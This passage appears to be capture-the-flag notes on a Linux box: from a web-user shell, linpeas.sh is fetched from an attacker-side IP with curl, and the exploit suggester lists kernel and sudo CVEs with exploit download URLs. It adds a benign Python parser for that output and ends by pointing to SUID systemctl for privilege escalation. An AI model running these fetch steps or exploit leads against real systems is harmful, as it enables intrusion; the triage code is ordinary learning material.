PEAS
www-data@jarvis:/tmp$ curl -s http://10.10.14.11:8000/linpeas.sh -o ./linpeas.sh ; chmod 777 ./linpeas.sh
Delivery complete
Executing PEAS
PEAS also picked up the old sudo version
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
write error: Broken pipe
[+] [CVE-2019-13272] PTRACE_TRACEME
details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
exposure: highly probable
tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},[ debian=9{kernel:4.9.0-*} ],debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
download url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
comments: Requires an active PolKit agent.
[+] [CVE-2017-16995] eBPF_verifier
details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
exposure: probable
tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
download url: https://www.exploit-db.com/download/45010
comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2021-3156] sudo Baron Samedit
details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
exposure: less probable
tags: mint=19,ubuntu=18|20, debian=10
download url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
exposure: less probable
tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
download url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
exposure: less probable
tags: ubuntu=20.04{kernel:5.8.0-*}
download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
exposure: less probable
tags: mint=19
download url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2017-6074] dccp
details: http://www.openwall.com/lists/oss-security/2017/02/22/3
exposure: less probable
tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
download url: https://www.exploit-db.com/download/41458
comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
exposure: less probable
tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
download url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-1000253] PIE_stack_corruption
details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
exposure: less probable
tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
download url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
Found some vulnerabilities. None of them are confirmed.
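Since none of these findings are confirmed, the suggester output above is best treated as a patch and verification list. The following is an added example, not part of the original notes or of linux-exploit-suggester: it parses output in this format, skips the "Broken pipe" noise, tolerates a header damaged by terminal wrapping, collapses duplicate CVEs and orders them by the tool's exposure rating. The function names and the sample text are constructed for illustration.

```python
import re
# Constructed sample in the format shown above: noise line, duplicate CVE, damaged header.
SAMPLE = """\
cat: write error: Broken pipe
[+] [CVE-2019-13272] PTRACE_TRACEME
   exposure: highly probable
   comments: Requires an active PolKit agent.
[+] [CVE-2021-3156] sudo Baron Samedit
   exposure: less probable
[+] [CVE-2021-3156] sudo Baron Samedit 2
   exposure: less probable
[+] [CVE-2019-18634] sudo pwfeedback
   exposure: less probable
   comments: sudo configuration requires pwfeedback to be enabled.
on] [CVE-2017-1000253] PIE_stack_corrupti
   exposure: less probable
"""

RANK = {"highly probable": 0, "probable": 1, "less probable": 2}
# Match on the bracketed CVE list so a damaged "[+]" prefix is tolerated.
HEADER = re.compile(r"\[((?:CVE-\d{4}-\d+,?)+)\]\s*(.*)")
FIELD = re.compile(r"^\s*(exposure|comments):\s*(.+)$")

def parse_findings(text):
    """Return one record per finding; lines that match nothing are skipped."""
    findings, cur = [], None
    for line in text.splitlines():
        h, f = HEADER.search(line), FIELD.match(line)
        if h:
            cur = {"cves": h.group(1).split(","), "name": h.group(2).strip(),
                   "exposure": "unknown", "precondition": None}
            findings.append(cur)
        elif f and cur:
            key = "precondition" if f.group(1) == "comments" else "exposure"
            cur[key] = f.group(2).strip()
    return findings

def triage(findings):
    """Collapse duplicate CVEs, then order by exposure rating and CVE id."""
    rank = lambda item: RANK.get(item["exposure"], 3)
    best = {}
    for item in findings:
        for cve in item["cves"]:
            if cve not in best or rank(item) < rank(best[cve]):
                best[cve] = item
    return sorted(best.items(), key=lambda kv: (rank(kv[1]), kv[0]))

if __name__ == "__main__":
    for cve, item in triage(parse_findings(SAMPLE)):
        print(f"{cve:<18}{item['exposure']:<17}{item['precondition'] or '-'}")
```

The precondition column is the part to check on the host (for example whether pwfeedback is set in sudoers) before treating a rating as meaningful.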
There are some compilers installed on the target system.
This is confirmed.
/bin/systemctl with the SUID bit set is extremely promising for privilege escalation.